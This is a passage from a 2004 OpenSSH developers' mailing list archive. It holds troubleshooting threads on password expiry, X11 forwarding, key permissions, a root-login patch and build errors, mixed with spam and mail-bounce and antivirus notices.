nitric acid strontium II type(SR(NO3)2 99% Min.)Packing: 25KG net plastic woven bags or as requested ? nitric acid strontium III type(SR(NO3)2 99.5% Min)Packing: 25KG net plastic woven bags or as requested > > 16.STRONTIUM BROMIDEmolecular formula: SrBr2.6H2O99.5%;99.0%,98.5%Properties: colorless or white crystal powder ,deliquescence nature, dissolved in water ethanol and amyl alcohol ,changed to be the substance without water, the dissolved point is 88c,poison,airproof saved. Use: analysis reagent, pharmacy industry > > Contract person: Weilin > Chongqing Xianfeng Sr Salt Chemical Co., Ltd. > Mail Address : chemical-market at 163.com From dberezin at acs.rutgers.edu Sat Mar 20 03:05:46 2004 From: dberezin at acs.rutgers.edu (Dmitry Berezin) Date: Fri, 19 Mar 2004 11:05:46 -0500 Subject: 3.8p1 password expiry, Solaris 8 In-Reply-To: <009701c40d4d$cd474760$5bd90680@acsdev78> Message-ID: <000901c40dcc$0a463800$5bd90680@acsdev78> I was able to replicate this problem, but only in the same window, that I have had opened since yesterday. After logging out of Gnome desktop and logging back in, I can no longer produce the same results. Most likely it was some combination of "su"s in the same session, but again, I am unable to replicate it anymore. "passwd", when called without any arguments, will try to change password of the originally logged in user, so in my case when sshd called passwd, it was somehow referring back to the account that logged into the desktop. Although, something like that would probably be a very rare case (and probably while testing), would it be safer to call passwd instead? -Dmitry. > -----Original Message----- > From: openssh-unix-dev-bounces+dberezin=acs.rutgers.edu at mindrot.org > [mailto:openssh-unix-dev-bounces+dberezin=acs.rutgers.edu at mindrot.org] On > Behalf Of Dmitry Berezin > Sent: Thursday, March 18, 2004 8:02 PM > To: 'Darren Tucker' > Cc: openssh-unix-dev at mindrot.org > Subject: RE: 3.8p1 password expiry, Solaris 8 > > > Yep, that's bug #808. Expiry will work OK if you set UsePAM=no. > > UsePAM=no works fine. > > I have some strange problem while running sshd in debug mode, though. If I > login to the server with Gnome 2.0 desktop as a regular user, su to root, > and then run sshd -ddd, then when some other user with expired password > tries to login and sshd tries to change password for that user, I get an > error message: > > WARNING: Your password has expired. > You must change your password now and login again! > passwd: Changing password for > Permission denied > > If I just ssh into the box and start sshd -ddd on some other port, the > problem does not occur. > > I will do some more tests tomorrow and post more precise info about this. > (It's late and I might be doing something wrong) > > -Dmitry. > > > > > -- > > Darren Tucker (dtucker at zip.com.au) > > GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 > > Good judgement comes with experience. Unfortunately, the experience > > usually comes from bad judgement.. > > _______________________________________________ > openssh-unix-dev mailing list > openssh-unix-dev at mindrot.org > http://www.mindrot.org/mailman/listinfo/openssh-unix-dev From postmaster at omega2.serpro.gov.br Sat Mar 20 04:07:57 2004 From: postmaster at omega2.serpro.gov.br (Mail Delivery Service) Date: Fri, 19 Mar 2004 14:07:57 -0300 Subject: Delivery Status Notification Message-ID: <404F843600154538@omega2.serpro.gov.br> - These recipients of your message have been processed by the mail server: debora.cardoso at receita.fazenda.gov.br; Failed; 5.3.0 (other or undefined mail system status) -------------- next part -------------- An embedded message was scrubbed... From: unknown sender Subject: no subject Date: no date Size: 143 Url: http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20040319/a0593a2d/attachment.mht From andreas at conectiva.com.br Sat Mar 20 04:54:32 2004 From: andreas at conectiva.com.br (Andreas) Date: Fri, 19 Mar 2004 14:54:32 -0300 Subject: X forwarding and BadWindow error Message-ID: <20040319175432.GD2062@conectiva.com.br> Has anybody else experienced weird X11 forwarding problems such as the one below: andreas at teste10:~> x3270 X Error of failed request: BadWindow (invalid Window parameter) Major opcode of failed request: 3 (X_GetWindowAttributes) Resource id in failed request: 0x404372 Serial number of failed request: 833 Current serial number in output stream: 834 or andreas at teste10:~> gq Gdk-ERROR **: BadWindow (invalid Window parameter) serial 737 error_code 3 request_code 38 minor_code 0 Gdk-ERROR **: BadAccess (attempt to access private resource denied) serial 738 error_code 10 request_code 102 minor_code 0 The application opens, but crashes with this error when I open a menu. Without ssh (that is, using export DISPLAY=mymachine:0), it works. My XFree86 version is 4.4.0, and openssh is 3.8p1. Trying from older XFree86 and openssh, it works. I couldn't isolate it yet, whether the problem is with X or openssh (or something else). From Sergio.Gelato at astro.su.se Sat Mar 20 10:03:35 2004 From: Sergio.Gelato at astro.su.se (Sergio Gelato) Date: Sat, 20 Mar 2004 00:03:35 +0100 Subject: X forwarding and BadWindow error In-Reply-To: <20040319175432.GD2062@conectiva.com.br> References: <20040319175432.GD2062@conectiva.com.br> Message-ID: <20040319230335.GA4206@astro.su.se> * Andreas [2004-03-19 14:54:32 -0300]: > Has anybody else experienced weird X11 forwarding problems such > as the one below: Yes. The problem is that OpenSSH 3.8 is trying to pioneer the use of the X11 SECURITY extension, which has existed since 1996 but obviously not received enough debugging attention so far. > andreas at teste10:~> x3270 > X Error of failed request: BadWindow (invalid Window parameter) > Major opcode of failed request: 3 (X_GetWindowAttributes) > Resource id in failed request: 0x404372 What's that window x3270 is trying to get the attributes of? (xwininfo might help.) Then either patch x3270 not to need this lookup, or launch the ssh client with ForwardX11Trusted=yes. If the opcode had been one of the X_*Property ones, you would have had the option of allowing (or silently ignoring) the access attempt in the SecurityPolicy file of your X server configuration. But I'm afraid that X_GetWindowAttributes restrictions are hardwired (in the X server implementations I have access to). There may be very good design reasons for hardwiring them, too. Advice: for the sake of ordinary users, set ForwardX11Trusted yes in ssh_config. As a developer, you can turn it off in your ~/.ssh/config, study what breaks, and try to help the maintainers of the affected applications improve their SECURITY-compatibility so that maybe someday we'll all be able to turn ForwardX11Trusted back off. From djm at mindrot.org Sat Mar 20 10:07:59 2004 From: djm at mindrot.org (Damien Miller) Date: Sat, 20 Mar 2004 10:07:59 +1100 Subject: X forwarding and BadWindow error In-Reply-To: <20040319175432.GD2062@conectiva.com.br> References: <20040319175432.GD2062@conectiva.com.br> Message-ID: <405B7D4F.6090807@mindrot.org> Andreas wrote: > Has anybody else experienced weird X11 forwarding problems such > as the one below: > > andreas at teste10:~> x3270 > X Error of failed request: BadWindow (invalid Window parameter) > Major opcode of failed request: 3 (X_GetWindowAttributes) > Resource id in failed request: 0x404372 > Serial number of failed request: 833 > Current serial number in output stream: 834 As of OpenSSH 3.8, X forwarding by default uses the XSECURITY extension to limit access to the client's X server. You can disable this using the ForwardX11Trusted option or you can adjust the server's policy (/etc/X11/xserver/SecurityPolicy for XFree) -d From dtucker at zip.com.au Sat Mar 20 11:46:17 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Sat, 20 Mar 2004 11:46:17 +1100 Subject: 3.8p1 password expiry, Solaris 8 In-Reply-To: <000901c40dcc$0a463800$5bd90680@acsdev78> References: <000901c40dcc$0a463800$5bd90680@acsdev78> Message-ID: <405B9459.3050206@zip.com.au> Dmitry Berezin wrote: > I was able to replicate this problem, but only in the same window, that I > have had opened since yesterday. After logging out of Gnome desktop and > logging back in, I can no longer produce the same results. Most likely it > was some combination of "su"s in the same session, but again, I am unable to > replicate it anymore. > "passwd", when called without any arguments, will try to change password of > the originally logged in user, so in my case when sshd called passwd, it was > somehow referring back to the account that logged into the desktop. Maybe something was fooling passwd about who the logged-on user was? (wtmp entries or something?) > Although, something like that would probably be a very rare case (and > probably while testing), would it be safer to call passwd > instead? The problem with doing that is some platforms won't allow non-root users to use "passwd username" even if the the username supplied is the same as the logged-in user. $ whoami dtucker $ uname Linux $ passwd dtucker passwd: Only root can specify a user name. -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From pirata at microsoft.com Sat Mar 20 14:48:11 2004 From: pirata at microsoft.com (pirata at microsoft.com) Date: Sat, 20 Mar 2004 00:48:11 -0300 Subject: hi Message-ID: <20040320034809.E603527C187@shitei.mindrot.org> see you -------------- next part -------------- A non-text attachment was scrubbed... Name: nomoney.zip Type: application/x-zip-compressed Size: 22254 bytes Desc: not available Url : http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20040320/73b9e3f5/attachment.bin From dtucker at zip.com.au Sat Mar 20 16:26:27 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Sat, 20 Mar 2004 16:26:27 +1100 Subject: rsa_public_encrypt : exponent too small or not odd error with SSH-1 with OpenSSL0.9.7d In-Reply-To: <004101c40d99$a1e6a060$230110ac@kurco> References: <004101c40d99$a1e6a060$230110ac@kurco> Message-ID: <405BD603.9010308@zip.com.au> Kumaresh wrote: > I have compiled OpenSSL-0.9.7d - the lastest version and when > OpenSSH-3.7.1p2 is compiled with this ssl library [0.9.7d], I am getting the > following error when SSH-1 connection is done. > I am using HP-UX IPF box and > I am doing 32 bit compilation only. Even I have changed the optimization > level for OpenSSL and no use. Does OpenSSL's "make test" self-test pass? -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From mizuno at azabu.co.jp Sat Mar 20 23:55:58 2004 From: mizuno at azabu.co.jp (Y.Mizuno) Date: Sat, 20 Mar 2004 21:55:58 +0900 Subject: (no subject) Message-ID: ? ?? ======================/From TOKYO,JAPAN/== ? ??? ?? AZABU Group, Inc. ? (c ? .^ ???? ? ?_ ??? http://www.azabugroup.co.jp/ ?? mailto:mizuno at azabugroup.co.jp ?? mailto:azabugroup at docomo.ne.jp (i-mode) ?? =============================/THANK YOU/==?? ?? ?? From secureshell-help at securityfocus.com Sat Mar 20 22:13:25 2004 From: secureshell-help at securityfocus.com (secureshell-help at securityfocus.com) Date: 20 Mar 2004 11:13:25 -0000 Subject: Returned post for secureshell@securityfocus.com Message-ID: <1079781209.6018.ezmlm@securityfocus.com> Hi! This is the ezmlm program. I'm managing the secureshell at securityfocus.com mailing list. I'm working for my owner, who can be reached at secureshell-owner at securityfocus.com. I'm sorry, the list moderators for the secureshell list have failed to act on your post. Thus, I'm returning it to you. If you feel that this is in error, please repost the message or contact a list moderator directly. --- Enclosed, please find the message you sent. -------------- next part -------------- An embedded message was scrubbed... From: staff at securityfocus.com Subject: Notify about your e-mail account utilization. Date: Mon, 15 Mar 2004 16:17:53 +0100 Size: 19987 Url: http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20040320/cd9cfcff/attachment.mht From roland.mainz at nrubsig.org Sun Mar 21 09:20:38 2004 From: roland.mainz at nrubsig.org (Roland Mainz) Date: Sat, 20 Mar 2004 23:20:38 +0100 Subject: X forwarding and BadWindow error References: <20040319175432.GD2062@conectiva.com.br> <20040319230335.GA4206@astro.su.se> Message-ID: <405CC3B6.8EF8F1A4@nrubsig.org> Sergio Gelato wrote: > > * Andreas [2004-03-19 14:54:32 -0300]: > > Has anybody else experienced weird X11 forwarding problems such > > as the one below: > > Yes. The problem is that OpenSSH 3.8 is trying to pioneer the use of the > X11 SECURITY extension, OpenSSH isn't the "pioneer" in this area. I myself wrote the patch to add support for the SECURITY extension for ssh.com's version of ssh and other applications exists which make use of the SECURITY extensions (for example: The "Trusted" versions of Unix). > which has existed since 1996 but obviously > not received enough debugging attention so far. The SECURITY extension is fine so far. Please FIX the toolkits - most of them (except Motif2) currently don't care about the existance of the SECURITY extension. ---- Bye, Roland -- __ . . __ (o.\ \/ /.o) roland.mainz at nrubsig.org \__\/\/__/ MPEG specialist, C&&JAVA&&Sun&&Unix programmer /O /==\ O\ TEL +49 2426 901568 FAX +49 2426 901569 (;O/ \/ \O;) From postmaster at kinn.com Thu Mar 18 05:57:18 2004 From: postmaster at kinn.com (postmaster at kinn.com) Date: Thu, 18 Mar 2004 02:57:18 +0800 Subject: Message delayed (chik@top2.ficnet.net.tw) Message-ID: Your message has been delayed and is still awaiting delivery to the following recipient(s): chik at top2.ficnet.net.tw Message delayed Your message is delayed Message for domain top2.ficnet.net.tw delayed at kinn.com. Unable to deliver to domain for 60 hours. Will continue trying for 48 hours. No action is required on your part. Last attempt failed because: DNS server could not be contacted or generated an unexpected response -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: multipart/alternative Size: 0 bytes Desc: not available Url : http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20040318/72d45727/attachment.bin From bob at proulx.com Mon Mar 22 05:53:15 2004 From: bob at proulx.com (Bob Proulx) Date: Sun, 21 Mar 2004 11:53:15 -0700 Subject: ssh only with password In-Reply-To: <200403181536.40609.imhaeuse@physik.uni-wuppertal.de> References: <200403181536.40609.imhaeuse@physik.uni-wuppertal.de> Message-ID: <20040321185315.GA28339@misery.proulx.com> Martin Imh?user wrote: > I must relogin on the same machine in my shell with ssh and without password. > For this I tried the procedure > ssh-keygen -t dsa and ssh-keygen -t rsa. Only one of those two are required. Personally I use only the 'rsa' type. > I copied the entries in /.ssh/id_dsa.pub and /.ssh/id_rsa.pub in > /.ssh/authorized_keys Did you mean a literal / there? Hope not. Those should go into your home directory, not /. So hopefully you put those in $HOME/.ssh. Also, the $HOME/.ssh/authorized_keys is on the _remote_ machine and not the local machine. Also, sometimes people do this with an text editor and accidentally word wrap the file. Therefore I recommend simply appending them with the shell and cat. These steps will correct any problems here. mv $HOME/.ssh/authorized_keys $HOME/.ssh/authorized_keys.bak cat $HOME/.ssh/id_rsa.pub >> $HOME/.ssh/authorized_keys chmod go-w $HOME/.ssh/authorized_keys > When I open a shell I type exec ssh-agent $SHELL and then ssh-add > and give my passphrases. Good. > When I now type ssh machinename my PC wants my password. The most common reason for this is that SSH finds insecure file permission modes on files or directories and therefore cannot trust the authorized_keys file. You most likely created one of the directories or files with group write permission. On the remote machine these commands will verify and correct the permissions. ls -ld $HOME $HOME/.ssh $HOME/.ssh/authorized_keys drwxr-xr-x 101 bob bob 10824 2004-03-21 11:39 /home/bob drwxr-xr-x 3 bob bob 488 2004-01-13 07:54 /home/bob/.ssh -rw-r--r-- 1 bob bob 2637 2004-01-09 20:23 /home/bob/.ssh/authorized_keys If you find one with group write permission change it with chmod. chmod go-w $HOME $HOME/.ssh $HOME/.ssh/authorized_keys That is the most likely problem and those steps should correct it. Bob From Stephen.Roylance at verizon.net Mon Mar 22 11:42:27 2004 From: Stephen.Roylance at verizon.net (Stephen Roylance) Date: Sun, 21 Mar 2004 19:42:27 -0500 Subject: PermitRootLogin issues Message-ID: <405E3673.9080000@verizon.net> Hello, I'm currently experiencing the issue laid out in this thread from last year: http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=106908815129641&w=2 The discussion that ensued resulted in a number of ideas on how best to 'fix' this issue. The two that seemed most reasonable were: 1. implement a pubkey-only option to PermitRootLogin that would only allow root to login using pubkey authentication. 2. implement a more flexible arrangement where a list of allowed authentication methods could passed to PermitRootLogin. I looked through the code and it seems that both are straightforward to code, but obviously 1 is much less work. I coded up an implemetation of pubkey-only that works for me, and it's attached. I'm willing to work on option 2, but since that's quite a bit more work, I'd like some assurance that that is the _right_ way before I start on it. I think some solution needs to be merged ASAP. I've seen the recommendation to use without-password if root logins for scripting must be allowed in various security docs. With more sites using PAM and non-typical authentication methods (LDAP, winbind), it can be a nasty shock (or worse, completely unnoticed) to an administrator when that option doesn't work as they expect. -Steve -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: pubkey-only2.patch Url: http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20040321/43707d51/attachment.ksh From PNURHQEUXBQHBIUZFTMJZJQP at 123.financialbuilder.info Mon Mar 22 14:41:58 2004 From: PNURHQEUXBQHBIUZFTMJZJQP at 123.financialbuilder.info (Cecil Cabrera) Date: Mon, 22 Mar 2004 03:41:58 -0000 Subject: See Where your website Ranks Message-ID: Is your website in the top 10 listings? Are you getting the traffic you need these days? Top 10 placement puts you in front of 87% of the entire searches on the Internet! On an average day, you'll find at least 340 million people accessing the search engines to find new businesses where they can purchase services/products. Can they find your website? If you are not in these top slots then you are not making the money you should be! Our clients have come to expect a 300-500% growth in sales and traffic from the first-rate optimization service we provide them. Our search engine optimization team is a group of highly skilled individuals whose level of expertise is unmatched in this industry. Just fill out the free analysis form and one of our Traffic specialists will send you a freee ranking report of where your website currently stands and then help you achieve search engine placement excellence. www.get-top-rankings.com If you want taken off of this mailing list, please go here: http://www.financialbuilder.info/takeoff.html EZR Or Mail Requests to: EZR 2052 Newport Blvd. Suite #6 PO Box 36 Costa Mesa, CA 92627 From andreas at conectiva.com.br Tue Mar 23 03:40:30 2004 From: andreas at conectiva.com.br (Andreas) Date: Mon, 22 Mar 2004 13:40:30 -0300 Subject: X forwarding and BadWindow error In-Reply-To: <405B7D4F.6090807@mindrot.org> References: <20040319175432.GD2062@conectiva.com.br> <405B7D4F.6090807@mindrot.org> Message-ID: <20040322164030.GB32554@conectiva.com.br> On Sat, Mar 20, 2004 at 10:07:59AM +1100, Damien Miller wrote: > to limit access to the client's X server. You can disable this using the > ForwardX11Trusted option or you can adjust the server's policy This option should probably be included in the sshd_config(5) manpage. From andreas at conectiva.com.br Tue Mar 23 03:43:17 2004 From: andreas at conectiva.com.br (Andreas) Date: Mon, 22 Mar 2004 13:43:17 -0300 Subject: X forwarding and BadWindow error In-Reply-To: <405B7D4F.6090807@mindrot.org> References: <20040319175432.GD2062@conectiva.com.br> <405B7D4F.6090807@mindrot.org> Message-ID: <20040322164317.GC32554@conectiva.com.br> On Sat, Mar 20, 2004 at 10:07:59AM +1100, Damien Miller wrote: > As of OpenSSH 3.8, X forwarding by default uses the XSECURITY extension > to limit access to the client's X server. You can disable this using the > ForwardX11Trusted option or you can adjust the server's policy Ups, my apologies, it *is* included in the manpage. From markus at openbsd.org Tue Mar 23 03:45:47 2004 From: markus at openbsd.org (Markus Friedl) Date: Mon, 22 Mar 2004 17:45:47 +0100 Subject: X forwarding and BadWindow error In-Reply-To: <20040322164030.GB32554@conectiva.com.br> References: <20040319175432.GD2062@conectiva.com.br> <405B7D4F.6090807@mindrot.org> <20040322164030.GB32554@conectiva.com.br> Message-ID: <20040322164547.GA26219@folly> On Mon, Mar 22, 2004 at 01:40:30PM -0300, Andreas wrote: > On Sat, Mar 20, 2004 at 10:07:59AM +1100, Damien Miller wrote: > > to limit access to the client's X server. You can disable this using the > > ForwardX11Trusted option or you can adjust the server's policy > > This option should probably be included in the sshd_config(5) manpage. > but it's a client option.... From andreas at conectiva.com.br Tue Mar 23 03:47:37 2004 From: andreas at conectiva.com.br (Andreas) Date: Mon, 22 Mar 2004 13:47:37 -0300 Subject: X forwarding and BadWindow error In-Reply-To: <20040322164547.GA26219@folly> References: <20040319175432.GD2062@conectiva.com.br> <405B7D4F.6090807@mindrot.org> <20040322164030.GB32554@conectiva.com.br> <20040322164547.GA26219@folly> Message-ID: <20040322164737.GD32554@conectiva.com.br> On Mon, Mar 22, 2004 at 05:45:47PM +0100, Markus Friedl wrote: > > This option should probably be included in the sshd_config(5) manpage. > > > > but it's a client option.... Yes, I was wrong, see my next email :) From postmaster at sun.life.com.br Mon Mar 22 23:41:03 2004 From: postmaster at sun.life.com.br (System Anti-Virus Administrator) Date: 22 Mar 2004 12:41:03 -0000 Subject: virus encontrado em mensagem enviada "read it immediately" Message-ID: Atencao: openssh-unix-dev at mindrot.org Um virus foi encontrado numa mensagem de Email que acabou de ser enviada por voce. Este scanner de Email a interceptou e impediu a mensagem de chegar no seu destino. O virus foi reportado como sendo: the W32/Netsky.b at MM virus !!! Por favor atualize seu antivirus ou contate o seu suporte tecnico o mais rapido possivel pois voce tem um virus no seu computador. Sua mensagem foi enviada com o seguinte envelope: REMETENTE: openssh-unix-dev at mindrot.org DESTINATARIO: vendas at jazam.com.br ... e com o seguinte cabecalho: --- MAILFROM: openssh-unix-dev at mindrot.org Received: from 200-153-159-73.dsl.telesp.net.br (HELO jazam.com.br) (200.153.159.73) by sun.life.com.br with SMTP; 22 Mar 2004 12:41:00 -0000 From: openssh-unix-dev at mindrot.org To: vendas at jazam.com.br Subject: read it immediately Date: Mon, 22 Mar 2004 09:41:26 -0300 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="15317740" --- From info-cvs-bounces at gnu.org Tue Mar 23 12:06:37 2004 From: info-cvs-bounces at gnu.org (info-cvs-bounces at gnu.org) Date: Mon, 22 Mar 2004 20:06:37 -0500 Subject: The results of your email commands Message-ID: The results of your email command are provided below. Attached is your original message. - Results: Ignoring non-text/plain MIME parts - Done. -------------- next part -------------- An embedded message was scrubbed... From: openssh-unix-dev at mindrot.org Subject: Re: Re: Document Date: Mon, 22 Mar 2004 22:02:23 -0300 Size: 1351 Url: http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20040322/af40660e/attachment.mht From agiri at sj.symbol.com Tue Mar 23 13:18:43 2004 From: agiri at sj.symbol.com (Amba giri) Date: Mon, 22 Mar 2004 18:18:43 -0800 Subject: A question on Compilation errors... Message-ID: Hello I am attempting to build on a LynxOS platform and am using a old version of zlib and OpenSSL-0.9.6a. I get past the configure stage by ignoring the zlib version check. However, at make stage I run into the following undefineds. Any idea what may be causing this. I am using version 3.8p1 of OpenSSH. Thank you in advance for your response Amba (cd openbsd-compat && make) make[1]: Nothing to be done for `all'. gcc -o ssh ssh.o readconf.o clientloop.o sshtty.o sshconnect.o sshconnect1.o sshconnect2.o -L. -Lopenbsd-compat/ -L/usr/local/ssl/lib -lssh -lopenbsd-compat -lcrypto -lz collect2: ld returned 1 exit status readconf.o: In function `parse_token': /openssh-3.8p1/readconf.c(263): undefined reference to `strcasecmp' readconf.o: In function `process_config_line': /openssh-3.8p1/readconf.c(723): undefined reference to `strcasecmp' /openssh-3.8p1/readconf.c(725): undefined reference to `strcasecmp' /openssh-3.8p1/readconf.c(727): undefined reference to `strcasecmp' sshconnect.o: In function `timeout_connect': /openssh-3.8p1/sshconnect.c(243): undefined reference to `howmany' sshconnect.o: In function `ssh_connect': /openssh-3.8p1/sshconnect.c(330): undefined reference to `getservbyname' sshconnect.o: In function `confirm': /openssh-3.8p1/sshconnect.c(545): undefined reference to `strncasecmp' /openssh-3.8p1/sshconnect.c(549): undefined reference to `strncasecmp' ./libssh.a(log.o): In function `log_facility_number': /openssh-3.8p1/log.c(101): undefined reference to `strcasecmp' ./libssh.a(log.o): In function `log_level_number': /openssh-3.8p1/log.c(113): undefined reference to `strcasecmp' ./libssh.a(log.o): In function `do_log': /openssh-3.8p1/log.c(329): undefined reference to `openlog' /openssh-3.8p1/log.c(330): undefined reference to `syslog' /openssh-3.8p1/log.c(331): undefined reference to `closelog' ./libssh.a(cipher.o): In function `cipher_by_name': /openssh-3.8p1/cipher.c(149): undefined reference to `strcasecmp' ./libssh.a(channels.o): In function `channel_prepare_select': /openssh-3.8p1/channels.c(1668): undefined reference to `howmany' ./libssh.a(packet.o): In function `packet_read_seqnr': /openssh-3.8p1/packet.c(833): undefined reference to `howmany' /openssh-3.8p1/packet.c(858): undefined reference to `howmany' ./libssh.a(packet.o): In function `packet_write_wait': /openssh-3.8p1/packet.c(1371): undefined reference to `howmany' /openssh-3.8p1/packet.c(1375): undefined reference to `howmany' ./libssh.a(canohost.o): In function `check_ip_options': /openssh-3.8p1/canohost.c(150): undefined reference to `getprotobyname' openbsd-compat//libopenbsd-compat.a(fake-rfc2553.o): In function `ssh_getnameinfo': /openssh-3.8p1/openbsd-compat/fake-rfc2553.c(64): undefined reference to `gethostbyaddr' openbsd-compat//libopenbsd-compat.a(fake-rfc2553.o): In function `ssh_getaddrinfo': /openssh-3.8p1/openbsd-compat/fake-rfc2553.c(164): undefined reference to `getservbyname' /openssh-3.8p1/openbsd-compat/fake-rfc2553.c(198): undefined reference to `gethostbyname' openbsd-compat//libopenbsd-compat.a(getrrsetbyname.o): In function `getrrsetbyname': /openssh-3.8p1/openbsd-compat/getrrsetbyname.c(190): undefined reference to `_res' /openssh-3.8p1/openbsd-compat/getrrsetbyname.c(190): undefined reference to `res_init' /openssh-3.8p1/openbsd-compat/getrrsetbyname.c(206): undefined reference to `res_query' /openssh-3.8p1/openbsd-compat/getrrsetbyname.c(209): undefined reference to `_h_errno' openbsd-compat//libopenbsd-compat.a(getrrsetbyname.o): In function `parse_dns_qsection': /openssh-3.8p1/openbsd-compat/getrrsetbyname.c(436): undefined reference to `dn_expand' openbsd-compat//libopenbsd-compat.a(getrrsetbyname.o): In function `parse_dns_rrsection': /openssh-3.8p1/openbsd-compat/getrrsetbyname.c(482): undefined reference to `dn_expand' collect2: ld returned 1 exit status make: *** [ssh] Error 1 WS5000# Amba Giri Symbol Technologies, San Jose P: 408-528-2721 E:agiri at sj.symbol.com Symbol. The Enterprise Mobility Company. From mark at mcs.vuw.ac.nz Tue Mar 23 16:22:56 2004 From: mark at mcs.vuw.ac.nz (Mark Davies) Date: Tue, 23 Mar 2004 17:22:56 +1200 Subject: gssapi, alpha's, OpenSSH 3.8p1 failing Message-ID: <200403231722.56628.mark@mcs.vuw.ac.nz> I have OpenSSH 3.8p1 built and working with GSSAPI based authentication on NetBSD/i386-current and Solaris 9 but then when I try it on both NetBSD/alpha-1.6.2 and Tru64-V5.1 I get: city-art% ssh -v embassy OpenSSH_3.8p1, SSH protocols 1.5/2.0, OpenSSL 0.9.7c 30 Sep 2003 debug1: Reading configuration data /etc/ssh/ssh_config debug1: Connecting to embassy [130.195.6.15] port 22. debug1: Connection established. debug1: read PEM private key done: type DSA debug1: read PEM private key done: type RSA debug1: identity file /u/staff/mark/.ssh/identity type 0 debug1: identity file /u/staff/mark/.ssh/id_rsa type 1 debug1: identity file /u/staff/mark/.ssh/id_dsa type -1 debug1: Remote protocol version 1.99, remote software version OpenSSH_3.8p1 debug1: match: OpenSSH_3.8p1 pat OpenSSH* debug1: Enabling compatibility mode for protocol 2.0 debug1: Local version string SSH-2.0-OpenSSH_3.8p1 debug1: SSH2_MSG_KEXINIT sent debug1: SSH2_MSG_KEXINIT received debug1: kex: server->client aes128-cbc hmac-md5 none debug1: kex: client->server aes128-cbc hmac-md5 none debug1: SSH2_MSG_KEX_DH_GEX_REQUEST(1024<1024<8192) sent debug1: expecting SSH2_MSG_KEX_DH_GEX_GROUP debug1: SSH2_MSG_KEX_DH_GEX_INIT sent debug1: expecting SSH2_MSG_KEX_DH_GEX_REPLY debug1: Host 'embassy' is known and matches the RSA host key. debug1: Found key in /etc/ssh/ssh_known_hosts:73 debug1: ssh_rsa_verify: signature correct debug1: SSH2_MSG_NEWKEYS sent debug1: expecting SSH2_MSG_NEWKEYS debug1: SSH2_MSG_NEWKEYS received debug1: SSH2_MSG_SERVICE_REQUEST sent debug1: SSH2_MSG_SERVICE_ACCEPT received debug1: Authentications that can continue: publickey,gssapi-with-mic,password,hostbased debug1: Next authentication method: gssapi-with-mic Connection closed by 130.195.6.15 and the server end reports: embassy sshd[312937]: fatal: Couldn't convert client name In the Tru64 case OpenSSH is built against Heimdal 0.5.1 and in the NetBSD/alpha case its built against the in tree version which I think is a similar vintage. The working NetBSD/i386 and Solaris versions are built against newer Heimdal releases. So can anyone suggest if this is an OpenSSH bug (alpha 64bit issue?) or a problem with the older Heimdal? And how can I fix this? cheers mark From dtucker at zip.com.au Tue Mar 23 16:46:09 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Tue, 23 Mar 2004 16:46:09 +1100 Subject: A question on Compilation errors... In-Reply-To: References: Message-ID: <405FCF21.9070107@zip.com.au> Amba giri wrote: > I am attempting to build on a LynxOS platform and am using a old > version of zlib and OpenSSL-0.9.6a. I get past the configure stage by > ignoring the zlib version check. However, at make stage I run into the > following undefineds. Any idea what may be causing this. I am using > version 3.8p1 of OpenSSH. Any reason you don't use newer zlib and openssl? You'll probably save yourself problems down the line. [...] > (cd openbsd-compat && make) > make[1]: Nothing to be done for `all'. > gcc -o ssh ssh.o readconf.o clientloop.o sshtty.o sshconnect.o > sshconnect1.o sshconnect2.o -L. > -Lopenbsd-compat/ -L/usr/local/ssl/lib -lssh -lopenbsd-compat > -lcrypto -lz > collect2: ld returned 1 exit status > readconf.o: In function `parse_token': > /openssh-3.8p1/readconf.c(263): undefined reference to `strcasecmp' [...] That is usually in libc. If your libc doesn't have it, you could probably borrow an implementation from OpenBSD's libc. > /openssh-3.8p1/sshconnect.c(243): undefined reference to `howmany' This is a macro defined in defines.h if MISSING_HOWMANY is defined. Try adding "#define MISSING_HOWMANY 1" to config.h. > ./libssh.a(log.o): In function `do_log': > /openssh-3.8p1/log.c(329): undefined reference to `openlog' > /openssh-3.8p1/log.c(330): undefined reference to `syslog' > /openssh-3.8p1/log.c(331): undefined reference to `closelog' No idea where you'd find this if it's not in libc. Check the OS documentation. [...] > /openssh-3.8p1/openbsd-compat/fake-rfc2553.c(164): undefined reference > to `getservbyname' [..] These are normally in libresolv. Try adding "-lresolv" to LDFLAGS. I suggest you add a *-lynxos) section to configure.ac with the required bits. -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From dtucker at zip.com.au Tue Mar 23 16:55:58 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Tue, 23 Mar 2004 16:55:58 +1100 Subject: gssapi, alpha's, OpenSSH 3.8p1 failing In-Reply-To: <200403231722.56628.mark@mcs.vuw.ac.nz> References: <200403231722.56628.mark@mcs.vuw.ac.nz> Message-ID: <405FD16E.40003@zip.com.au> Mark Davies wrote: > I have OpenSSH 3.8p1 built and working with GSSAPI based authentication on > NetBSD/i386-current and Solaris 9 but then when I try it on both > NetBSD/alpha-1.6.2 and Tru64-V5.1 I get: > > city-art% ssh -v embassy > OpenSSH_3.8p1, SSH protocols 1.5/2.0, OpenSSL 0.9.7c 30 Sep 2003 [snip] > embassy sshd[312937]: fatal: Couldn't convert client name The entire server-side debugging (ie 